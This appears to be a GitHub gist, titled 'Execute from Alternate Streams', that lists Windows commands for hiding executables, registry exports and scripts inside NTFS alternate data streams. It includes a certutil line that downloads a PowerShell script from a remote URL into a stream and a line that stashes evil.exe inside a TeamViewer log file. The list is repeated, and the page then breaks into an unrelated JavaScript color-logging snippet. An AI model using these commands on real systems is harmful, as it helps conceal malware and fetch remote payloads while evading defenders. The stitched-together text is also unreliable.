adamick098 / Exe_ADS_Methods.txt
Created August 11, 2021 09:44 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams
###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
api0cradle / Exe_ADS_Methods.md
Last active April 16, 2024 13:25
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

// Print the joined arguments to the console in the given CSS color.
function logColor(color, args) {
  console.log(`%c ${args.join(' ')}`, `color: ${color}`);
}

// One logging helper per named CSS color.
const log = {
  aliceblue: (...args) => { logColor('aliceblue', args); },
  antiquewhite: (...args) => { logColor('antiquewhite', args); },
  aqua: (...args) => { logColor('aqua', args); },
  aquamarine: (...args) => { logColor('aquamarine', args); },
  azure: (...args) => { logColor('azure', args); },
};